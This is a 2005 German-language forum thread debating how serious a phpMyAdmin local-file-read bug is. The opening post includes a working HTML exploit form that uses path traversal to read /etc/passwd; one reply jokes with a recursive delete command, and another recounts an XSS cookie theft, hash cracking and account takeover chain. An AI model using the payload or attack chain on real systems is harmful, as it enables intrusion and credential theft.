View previous topic :: View next topic |
Author |
Message |
STiGMaTa_ch Veteran
Joined: 28 Dec 2004 Posts: 1686 Location: Rüti ZH / Schweiz
|
Posted: Wed Oct 12, 2005 10:36 am Post subject: [OTsecurity] PHPMyAdmin liest lokale Files. Ernstes Problem? |
|
|
Hallo zusammen
Sicher haben einige von euch schon mitbekommen, dass PHPMyAdmin lokale Dateien auslesen kann (Heise:PHPMyAdmin liest lokale Dateien) wegen eines Fehlers in libraries/grab_globals.lib.php.
Mit folgendem Exploit kann man z.B. mittels einem lokal installierten PHPMyAdmin, andere lokale Dateien auslesen:
Code: | <CENTER>
<A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://<DEIN_RECHNERNAME_ODER_DEINE_IP>/phpmyadmin/index.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM> |
Was ich mich nun frage, ist dies einfach nur ein "lästiger BUG" oder wirklich als ernsthaftes Security Problem anzusehen?
Versteht mich nicht falsch, mir ist klar, dass eine Webapplikation keine anderen Dateien auf dem System auslesen sollte dürfen. Nur, irgendwie konnte ich mit diesem Exploit nichts kritisches anfangen.
- Drückt man einfach mal auf exploit, dann wird mir /etc/passwd ausgegeben. Und nu? Ist das ein echtes Problem, wenn jemand weiss, welche Benutzer ich auf dem System habe? Ich meine, sofern die Benutzer starke Passwörter verwenden sollte das doch kein Problem sein, dass jemand weiss was es für Benutzer gibt oder?
- Gebe ich als Pfad /etc/shadow ein, erhalte ich eine Permission Denied Meldung. Somit hat man also keine Angriffsfläche um die Passwörter des Systems zu bruteforcen.
- Gebe ich z.B. den Pfad zu meiner Konfigurationsdatei von phprojekt an, welche z.B. das mysql passwort enthält, erhalte ich eine leere Seite, da der Code nicht einfach als Text ausgegeben, sondern von apache interpretiert wird.
Ich möchte hier keinen Flamewar oder irgendwas lostreten. Ich persönlich habe einfach nur das Gefühl, dass dieser BUG zwar unschön, störend oder was auch immer, jedoch nicht wirklich kritisch ist, wenn man eine halbwegs durchdachte gentoo Installation vor sich hat. Oder übersehe ich da was fulminantes? Wenn ja, her mit den Infos, ich werde jeden Tag gerne etwas schlauer
Lieber Gruss
STiGMaTa |
|
Back to top |
|
|
moe Veteran
Joined: 28 Mar 2003 Posts: 1289 Location: Potsdam / Germany
|
Posted: Wed Oct 12, 2005 11:04 am Post subject: |
|
|
Hmm, solche Fragen haben immer viel Streitpotential
Ich sehe es ähnlich wie du, der Zugriff auf die Dateien findet im Benutzerkontext von apache statt, wirkliche wichtige Sachen sollten damit also (ein vernünftiges Setup vorausgesetzt) nicht lesbar sein.
Andersrum gibt es genug Punkte die dann potentiell auch zu einer Gefahr werden könnten, zum einen ist der Bruteforceaufwand sehr viel geringer, wenn ich schon weiss welche Benutzer eine Shell haben. Zum anderen gibts noch viele Dienste, in denen Passwörter im klartext in einer conf stehen, und gerade im Bereich der Webapplikationen, kann man diese Sachen auch nicht für den Apache unlesbar machen. Bei deiner Konfigurationsdatei von phprojekt hats nicht geklappt, da sie .php heisst und vom apache interpretiert wird, aber es gibt sicher einige Projekte bei denen die Konfigurationsdateien nicht auf php enden, und ausserdem ist die Chance relativ hoch eine Sicherheitskopie zu finden, die dann auch nicht auf .php endet..
Also alles in allem seh ich diesen Bug als sehr kritisch an, sich beruhigt zurücklehnen kann man eigentlich nur, wenn der phpmyadmin in einem chrooteten dedicated Apache läuft
Gruss Maurice |
|
Back to top |
|
|
Anarcho Advocate
Joined: 06 Jun 2004 Posts: 2970 Location: Germany
|
Posted: Wed Oct 12, 2005 11:11 am Post subject: |
|
|
Oder wenn der PHPMyAdmin nur durch ne Userauthentifikation erreichbar ist und das somit nur der Admin darf.
Aber wenn der, wie bei hosterns üblich, den Usern zur Verfügung gestellt wird, würde ich schleunigst was dran ändern! _________________ ...it's only Rock'n'Roll, but I like it!
Last edited by Anarcho on Wed Oct 12, 2005 11:13 am; edited 1 time in total |
|
Back to top |
|
|
Marlo Veteran
Joined: 26 Jul 2003 Posts: 1591
|
Posted: Wed Oct 12, 2005 11:12 am Post subject: Re: [OTsecurity] PHPMyAdmin liest lokale Files. Ernstes Prob |
|
|
STiGMaTa_ch wrote: | Und nu? Ist das ein echtes Problem,...
|
Das Kommt m.e. auf die Kombination weiterer php Einstellungen an. Siehe hier. Und spaßeshalber kannst du john mit den richtigen Wörterbüchern mal gegen die passwd laufen lassen.
Ein "sofern die Benutzer starke Passwörter verwenden", scheint mir ein schwacher Trost. Es ist unglaublich, was man mit einfachen Sachen so alles machen kann; entsprechende php-Möglichkeiten vorausgesetzt.
Gruß
Ma _________________ ------------------------------------------------------------------
http://radio.garden/ |
|
Back to top |
|
|
amne Bodhisattva
Joined: 17 Nov 2002 Posts: 6378 Location: Graz / EU
|
Posted: Wed Oct 12, 2005 11:15 am Post subject: Re: [OTsecurity] PHPMyAdmin liest lokale Files. Ernstes Prob |
|
|
STiGMaTa_ch wrote: |
Was ich mich nun frage, ist dies einfach nur ein "lästiger BUG" oder wirklich als ernsthaftes Security Problem anzusehen?
|
Nur weil man lokale Files lesen kann bekommt man meist noch keine lokale rootshell, aber man hat halt zumindest eine Tür, die eigentlich zu sein sollte erfolgreich aufgemacht und bekommt Zugriff auf Dinge, die man eigentlich nicht sehen sollte. Wenn "Anwendung X gibt mehr Zugriff auf das System preis als sie sollte" als Sicherheitsproblem betrachtet (was meiner Meinung nach die meisten Leute tun) handelt es sich also um ein solches.
STiGMaTa_ch wrote: |
Versteht mich nicht falsch, mir ist klar, dass eine Webapplikation keine anderen Dateien auf dem System auslesen sollte dürfen. Nur, irgendwie konnte ich mit diesem Exploit nichts kritisches anfangen.
- Drückt man einfach mal auf exploit, dann wird mir /etc/passwd ausgegeben. Und nu? Ist das ein echtes Problem, wenn jemand weiss, welche Benutzer ich auf dem System habe? Ich meine, sofern die Benutzer starke Passwörter verwenden sollte das doch kein Problem sein, dass jemand weiss was es für Benutzer gibt oder?
|
Der Angreifer weiss jetzt mehr als zuvor - z.B. dass es auf deinem System den Benutzer seppl gibt. Wenn der Angreifer dich und dein Umfeld persönlich kennt und noch dazu weiss, dass Seppl selten sinnvolle Passwörter setzt und seine Freundin Gretl heisst. Dann noch die vergessene Kopie von /etc/ in /mnt/backup, die für jedermann lesbar war - auch den apache-User.
Glücklicherweise gibt es auf sinnvoll aufgesetzten Systemen mehr als eine Hürde zu überwinden. _________________ Dinosaur week! (Ok, this thread is so last week) |
|
Back to top |
|
|
b3cks Veteran
Joined: 23 Mar 2004 Posts: 1481 Location: Bremen (GER)
|
Posted: Wed Oct 12, 2005 11:17 am Post subject: |
|
|
Als ich das gelesen habe, hab ich mir nur zwei Fragen gestellt:
a) Wer veröffentlicht denn bitteschön den Link zu seinem PHPMyAdmin?
b) Wer schützt das Teil nicht richtig? (HTAccess würde schon ausreichen und ist AFAIK sogar eine Funktion von diesem Tool)
Man brauch allerdings nur halbwegs Google bedienen können, um herauszufinden, dass es anscheinend so einige gibt.
Dann brauch man sich nur noch den Server etwas genauer anzugucken, was da noch so "interessantes" drauf läuft und mit etwas Glück kann man wertvolle Configs und andere Dateien auslesen, um so an sensible Daten zu kommen. Im Endeffekt aber alles nur Spielerei. _________________ I am /root and if you see me laughing you better have a backup. |
|
Back to top |
|
|
Anarcho Advocate
Joined: 06 Jun 2004 Posts: 2970 Location: Germany
|
Posted: Wed Oct 12, 2005 11:25 am Post subject: |
|
|
b3cks wrote: | Als ich das gelesen habe, hab ich mir nur zwei Fragen gestellt:
a) Wer veröffentlicht denn bitteschön den Link zu seinem PHPMyAdmin?
b) Wer schützt das Teil nicht richtig? (HTAccess würde schon ausreichen und ist AFAIK sogar eine Funktion von diesem Tool)
Man brauch allerdings nur halbwegs Google bedienen können, um herauszufinden, dass es anscheinend so einige gibt.
Dann brauch man sich nur noch den Server etwas genauer anzugucken, was da noch so "interessantes" drauf läuft und mit etwas Glück kann man wertvolle Configs und andere Dateien auslesen, um so an sensible Daten zu kommen. Im Endeffekt aber alles nur Spielerei. |
So einfach ist die Geschichte nicht:
Viele Webhoster bieten eine MySQL Datenbank an. Um diese zu administrieren bieten sie zusätzlich PHPMyAdmin an.
Und da kann jeder Kunde drauf zugreifen.
Sicher, auch diese sollte noch durch weitere Massnahmen geschützt sein - aber das Risikio besteht. _________________ ...it's only Rock'n'Roll, but I like it! |
|
Back to top |
|
|
moe Veteran
Joined: 28 Mar 2003 Posts: 1289 Location: Potsdam / Germany
|
Posted: Wed Oct 12, 2005 11:33 am Post subject: |
|
|
Bei öffentlichen Hostern sehe ich auch das grösste Gefahrenpotential.. Wenn die Hoster selbst phpmyadmin anbieten, können (bzw. sollten) sie ihn auch sicher konfigurieren, und bei Bekanntwerden von Sicherheitslücken selbige schliessen.
Anders siehts aber aus, wenn sich der Kunde selbst phpmyadmin installiert, dann existiert zwar kein Link den Google vielleicht findet, aber ein Skript, der das Vorhandensein von $domainname/phpmyadmin/ überprüft, ist ja auch keine Schwierigkeit. Das Schlimme ist dann, dass nicht nur der Kunde selbst, der sein phpmyadmin nicht absichert, gefährdet ist, sondern jeder andere Kunde auf dem System, und evtl. auch das System selbst.
Lösung? Jeder Hoster muss Code: | find /home -name phpmyadmin -exec rm -fr {} | ausführen Oder solange bis die Gefahr vorbei ist den httpd stoppen.
Spass beiseite, alle die eine Webseite auf einem fremden Webserver gehostet haben, sollten wohl mal ihre Verzeichnisse und Dateien nach ungeschützten Klartextpasswörtern durchsuchen..
Gruss Maurice |
|
Back to top |
|
|
b3cks Veteran
Joined: 23 Mar 2004 Posts: 1481 Location: Bremen (GER)
|
Posted: Wed Oct 12, 2005 11:46 am Post subject: |
|
|
@Anarcho:
Klar, das wird auch, wie moe sagte, das größte Prob sein. Aber wie auch gesagt, kann man das mit einfachsten und professionellen Mitteln unterbinden.
Man darf gespannt sein, was alles passiert... oder eben nicht. _________________ I am /root and if you see me laughing you better have a backup. |
|
Back to top |
|
|
Deever Veteran
Joined: 06 Jul 2002 Posts: 1354 Location: Zürich / Switzerland
|
Posted: Wed Oct 12, 2005 12:05 pm Post subject: |
|
|
Wer benutzt eigentlich diesen PHP Krempel? MySQL Control Center existiert und läßt sich auch perfekt tunneln.
Gruß,
/dev |
|
Back to top |
|
|
b3cks Veteran
Joined: 23 Mar 2004 Posts: 1481 Location: Bremen (GER)
|
Posted: Wed Oct 12, 2005 2:57 pm Post subject: |
|
|
Deever wrote: | Wer benutzt eigentlich diesen PHP Krempel? |
Hoster <-> Kunde!? Mobility!?
Wie oben schon angedeutet. Oder willst du jedem Kunden Software aufzwingen und was machste unterwegs? _________________ I am /root and if you see me laughing you better have a backup. |
|
Back to top |
|
|
Anarcho Advocate
Joined: 06 Jun 2004 Posts: 2970 Location: Germany
|
Posted: Wed Oct 12, 2005 3:06 pm Post subject: |
|
|
Ach lass den deever mal reden - der benutzt auch so ne komische shell ... _________________ ...it's only Rock'n'Roll, but I like it! |
|
Back to top |
|
|
Deever Veteran
Joined: 06 Jul 2002 Posts: 1354 Location: Zürich / Switzerland
|
Posted: Wed Oct 12, 2005 4:36 pm Post subject: |
|
|
Wieso komische Shell? Wer eigenartige[tm] find<->grep<->ls Pipes bevorzugt, kann ja die Bash nehmen, nur zum vernünftigen Arbeiten ist die zsh *einiges* besser geeignet.
PS: Sorry übrigens wegen dem mysqlcc-Link, schließlich hat ja nicht jeder SSH-Zugang zu seinem Server!
Gruß,
/dev |
|
Back to top |
|
|
STiGMaTa_ch Veteran
Joined: 28 Dec 2004 Posts: 1686 Location: Rüti ZH / Schweiz
|
Posted: Wed Oct 12, 2005 8:05 pm Post subject: |
|
|
@moe
Quote: | [...]zum einen ist der Bruteforceaufwand sehr viel geringer, wenn ich schon weiss welche Benutzer eine Shell haben[...] |
@amne
Quote: | [...]Der Angreifer weiss jetzt mehr als zuvor - z.B. dass es auf deinem System den Benutzer seppl gibt[...] |
Aber geht das nicht irgendwo in Richtung "Security trough Obscurity"??? Eigentlich sollte es mir doch egal sein können ob "DeR BoeSe HaCKeR" nun weiss dass es den seppl gibt, oder nicht? Natürlich immer in der Annahme, dass ich z.B. nur Logins via Key+SSH Kombinationen akzeptiere, mein zusätzlich zu Apache laufender FTP Server keinen BUG hat und mit dem Kernel auch nichts faul ist. Oder übersehe ich was?
@alle
Ich bin ganz bestimmt kein Security spezialist (was dieses Posting ja bereits beweist). Aber manchmal habe ich einfach das Gefühl, dass die Leute ein riesen TamTam um Bugs wie diesen hier machen, und ich finde den eigentlich - für sich alleine genommen - gar nicht so schlimm. Gehe ich daher recht in der Annahme, dass die meisten Einbrüche, Hacks oder wie auch immer man das nennen mag seltener aus einem Bug dieser Art entstehen, sondern vielmehr aus einer Kombination von mehreren ungünstigen Situationen?
Oder anders gesagt:
Wenn ich z.B. einen LAMP Server habe, welcher zusätzlich noch mit z.B. proFTPd ausgestattet ist und ich für Augewählte Personen noch Login Accounts über SSH mittels Keys anbiete. Wenn ich weiterhin sonst keine Dienste auf dem Server anbiete und regelmässig (z.B. 1-2x) in der Woche GLSA lese, Heise Security abklappere und auch meine Installation immer wieder auf den neusten Stand bringe, dann kann ich doch eigentlich über solch einen Vorfall müde gähnen oder?
Selbst wenn der jetzt 4 oder 5 Tage nicht behoben wird, könnte mir das doch egal sein, oder?
Lieber Gruss
STiGMaTa |
|
Back to top |
|
|
b3cks Veteran
Joined: 23 Mar 2004 Posts: 1481 Location: Bremen (GER)
|
Posted: Wed Oct 12, 2005 8:11 pm Post subject: |
|
|
@Deever: Ich glaube der Support des Hosters würde sich auch erschießen, wenn dieser seinen Kunden SSH Login anbietet und dann sagt man könne ja alles über die MySQL-Console machen.
@STiGMaTa_ch: Du hast schon recht. Wer halbwegs auf dem laufenden ist und ein bisschen 'nen Plan davon hat, kann darüber - eigentlich - nur schmunzeln. Es ist aber trotzdem nicht ausgeschlossen, dass durch so einen Bug Schaden entstehen kann, vor allem auf Servern, die nach Standard installiert sind bzw. die darauf laufende Software. Nur mal ein harmloses Beispiel: Ich habe einen WebServer laufen mit einer CMS Software für eine Webseite. Diese braucht natürlich MySQL als Backend. Nun findet jemand heraus, dass bei mir PHPMyAdmin mit dem oben besagtem Bug läuft und dieser haut auf dem System auch hin. Nun überprüft der "Angreifer" erst, was für ein Webserver und welche Distribution auf dem Server läuft. Sowas rauszufinden ist kein Kunststück. Er findet raus, dass es ein Apache WebServer auf Distribution X ist. Nun kann er mittels des Bugs z.B. die httpd.conf auslesen, wenn er weiß wo die liegt. Man kann es natürlich auch nachgucken. Wie gesagt, wir gehen von Standardkonfiguration aus. Nun könnte er damit herausfinden wo genau die CMS Software liegt. Jetzt braucht er sich nur mit der Software auseinandersetzen und herausfinden, in welcher Datei die Login-Daten für die Datenbank gespeichert sind und kann diese auch auslesen. Wenn das ganze klappt, hat er ein bisschen Spaß mit der CMS-Datenbank, mit etwas mehr Glück hat er auch noch mehr Spaß mit anderen Datenbanken. Wie ich schon sagte ist sowas, in meinen Augen, nur Spielerei. Es kommt immer auf die Situation an, mit etwas Glück bzw. Pech, je nach Sicht des Betrachters, sind auch ganz andere Sachen möglich. _________________ I am /root and if you see me laughing you better have a backup. |
|
Back to top |
|
|
nic0000 l33t
Joined: 25 Sep 2005 Posts: 658
|
Posted: Thu Oct 13, 2005 1:41 am Post subject: |
|
|
Ich klink mich mal hier einfach ungefragt ein
b3cks wrote: |
@STiGMaTa_ch: Du hast schon recht. Wer halbwegs auf dem laufenden ist und ein bisschen 'nen Plan davon hat, kann darüber - eigentlich - nur schmunzeln. | Da unterscheide ich mich wohl in meiner Einstellung. Ich finde man kann nie genug Plan haben. Dieser Bug bereitet mir jetzt nicht schlaflose Nächte, aber ich fühle mich deshalb nicht unbedingt sicher.
b3cks wrote: |
Es ist aber trotzdem nicht ausgeschlossen, dass durch so einen Bug Schaden entstehen kann, vor allem auf Servern, die nach Standard installiert sind bzw. die darauf laufende Software. |
Das ist auch meine Erfahrung. Dabei würde ich noch nicht mal darauf bestehen das alles standardmäßig installiert werden muß.
b3cks wrote: |
Nur mal ein harmloses Beispiel:
[...]
Nun überprüft der "Angreifer" erst, was für ein Webserver und welche Distribution auf dem Server läuft. Sowas rauszufinden ist kein Kunststück. | Dazu ist ja noch nicht mal dieser Bug notwendig
b3cks wrote: |
Er findet raus, dass es ein Apache WebServer auf Distribution X ist. Nun kann er mittels des Bugs z.B. die httpd.conf auslesen, wenn er weiß wo die liegt. Man kann es natürlich auch nachgucken. Wie gesagt, wir gehen von Standardkonfiguration aus. Nun könnte er damit herausfinden wo genau die CMS Software liegt. Jetzt braucht er sich nur mit der Software auseinandersetzen und herausfinden, in welcher Datei die Login-Daten für die Datenbank gespeichert sind und kann diese auch auslesen. Wenn das ganze klappt, hat er ein bisschen Spaß mit der CMS-Datenbank, mit etwas mehr Glück hat er auch noch mehr Spaß mit anderen Datenbanken. |
Das ist schon mal ein guter Ansatz
b3cks wrote: | Wie ich schon sagte ist sowas, in meinen Augen, nur Spielerei. | Das sehe ich kritischer. Meistens stehen dann in diesen DB Sachen auf die der Admin dann selbst keinen Einfluss mehr hat. Kluges Datamining und bisschen Psychologie/Soziologie vorausgesetzt und schon wird irgendwo im System an absolut nicht vorrausahnender Stelle eine Tür in dieses oder ein anderes System gemeißelt.
b3cks wrote: | Es kommt immer auf die Situation an, mit etwas Glück bzw. Pech, je nach Sicht des Betrachters, sind auch ganz andere Sachen möglich. | Das meine ich auch. Hacken ist wie Schachspielen: Man bringt seine Figuren in Position und die ersten Züge bringen einen Vorteil entscheiden aber nicht das gesamte Spiel. Mit anderen Worten: Ein klug konfiguriertes System ist schon mal etwas gutes, aber leider keine Garantie für "Unangreifbarkeit".
Deshalb finde ich gut das selbst um solche eher nicht kritischen Probleme bisschen "TamTam" gemacht wird, denn so kriegen es selbst die Leute mit die garnicht die Ahnung haben was sie da eigentlich tun (Dank der billigen Rootserver kenne ich eine Menge von). Man sollte immer von dem blödesten Admin ausgehen, ansonsten findet man sich sehr schnell in der M$ "loser" Ecke wieder in der ja auch immer alles verschwiegen/verharmlost wird.
just my 5cent
grüße
nico |
|
Back to top |
|
|
Anarcho Advocate
Joined: 06 Jun 2004 Posts: 2970 Location: Germany
|
Posted: Thu Oct 13, 2005 5:11 am Post subject: |
|
|
So, jetzt mal ein echtes Beispiel aus der Praxis (selber mal zu testzwecken durchgeführt):
Note: Zugegeben - der Admin war wirklich nicht der klügste (wie ihr sehen werdet), meinte aber alles im Griff zu haben, daher auch der kleine Versuch.
Es gab in PHPKit eine schwachstelle die Cross Site Scripting erlaubte. Daraufhin habe ich einen Exploit geschrieben der mir das Cookie eines Users in meine Datenbank speichert. Dieses Cookie enthält das Passwort des users als md5 hash zwecks Autologin.
Nachdem also ich also das md5 hash des Adminpassworts in meiner Datenbank hatte reichte ein 2 Stunden Test mit mdcrack und ich hatte auch das dazugehörige Klartextpasswort. Damit konnte ich mich nun PHPKit gegenüber als Admin anmelden und über das AdminControlPanel einen Dump der Datenbank runterladen. Darin wiederrum waren alle Userdaten und ebenfalls deren Passwörter als md5 hashes. Diese hätte ich auch weiter bearbeiten können aber da es nur Demonstration war, habe ich das gelassen. Weiter gibt es aber noch einen Hauptbenutzer bei PHPKit der aber auch in dieser Datenbank steht. Dessen Passwort war nur 4-stellig und daher in 2 Sekunden geknackt. Dummerweise war der Admin so dumm das der Login zum Webinterface seines Providers das gleiche Passwort benutzte. Somit hatte ich also schon zugriff auf das Webinterface. Dort konnte man alle Passwörter ändern - auch das FTP-Passwort und schon hatte ich zugriff auf den FTP. Das MySQL Passwort war mir egal - ich hatte den Dump ja schon, aber ich hätte auch das ändern können.
Mit all diesen Zugriffsrechten hätte ich nun wirklich alles machen können und das ganze nur weil der Admin auf nen Link in seinem Gästebuch geklickt hatte.
Was ich damit sagen will: Da viele Leute ihre Passwörter mehrfach verwenden (ja auch ich schonmal) kann so ein kleines Sicherheitsloch eine verdammt grosse Wirkung haben. Daher sollte man bei jeder Software die irgendwie öffentlich zugänglich ist verdammt aufpassen und das NICHT auf die leichte Schulter nehmen.
Ich persönlich habe phpmyadmin noch in einer verdammt alten Version drauf. Aber da nur ich dan den phpmyadmin ran komme ist mir das persönlich egal obwohl ich den doch upgraden werde denn wie man ja gesehen hat könnte es doch möglich sein über eine andere Schwachstelle vielleicht meine .htaccess zu löschen und dann wäre ich ziemlich gekniffen.
Hacken ist immer eine Kombination von vielen Dingen - sowas wie ne direkte Shell (MS SQL Server) findest du eben fast nur bei MS.
Ach ja: Mittels SQL Injection geht das ganze noch einfacher - da bekommt man nämlich die hashes auf dem Servierteller. _________________ ...it's only Rock'n'Roll, but I like it! |
|
Back to top |
|
|
nic0000 l33t
Joined: 25 Sep 2005 Posts: 658
|
Posted: Thu Oct 13, 2005 6:11 am Post subject: |
|
|
Anarcho wrote: | Note: Zugegeben - der Admin war wirklich nicht der klügste (wie ihr sehen werdet), meinte aber alles im Griff zu haben, daher auch der kleine Versuch. |
Also laut meiner Erfahrung trifft das locker auf 50% aller von mir untersuchten Systeme im Internet und 90% im Intranet.
Anarcho wrote: |
Was ich damit sagen will: Da viele Leute ihre Passwörter mehrfach verwenden (ja auch ich schonmal) kann so ein kleines Sicherheitsloch eine verdammt grosse Wirkung haben. Daher sollte man bei jeder Software die irgendwie öffentlich zugänglich ist verdammt aufpassen und das NICHT auf die leichte Schulter nehmen. |
Full ACK
Anarcho wrote: | Hacken ist immer eine Kombination von vielen Dingen - sowas wie ne direkte Shell (MS SQL Server) findest du eben fast nur bei MS. |
Oh, da habe ich schon so manches nicht nur bei M$ gesehen
Aber zugegeben es ist schon machmal "beeindruckend" wie sicher M$ teilweise seine Enterprice Produkte hält
grüße
nico |
|
Back to top |
|
|
amne Bodhisattva
Joined: 17 Nov 2002 Posts: 6378 Location: Graz / EU
|
Posted: Sat Oct 15, 2005 8:54 am Post subject: |
|
|
STiGMaTa_ch wrote: |
@amne
Quote: | [...]Der Angreifer weiss jetzt mehr als zuvor - z.B. dass es auf deinem System den Benutzer seppl gibt[...] |
Aber geht das nicht irgendwo in Richtung "Security trough Obscurity"??? Eigentlich sollte es mir doch egal sein können ob "DeR BoeSe HaCKeR" nun weiss dass es den seppl gibt, oder nicht?
|
Ich würde es nicht unbedingt als Security by Obscurity bezeichnen, da das Konzept ja nicht darauf beruht, dass keiner weiss, dass seppl einen Account hat. Du hat aber schon recht, eigentlich sollte es auf einem gut aufgesetzten System völlig egal sein.
Trotzdem gilt noch immer: Anwendung X gibt Informationen preis, die sie nicht hergeben sollte, daher sicherheitskritischer Bug (in der Anwendung).
STiGMaTa_ch wrote: |
Natürlich immer in der Annahme, dass ich z.B. nur Logins via Key+SSH Kombinationen akzeptiere, mein zusätzlich zu Apache laufender FTP Server keinen BUG hat und mit dem Kernel auch nichts faul ist. Oder übersehe ich was?
|
Sprich gut aufgesetztes System mit sinnvoll gesetzten Passwörtern usw. Siehe auch Anarchos leicht erschreckendes (wenn auch nicht allzu überraschender) Beitrag dazu. _________________ Dinosaur week! (Ok, this thread is so last week) |
|
Back to top |
|
|
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
|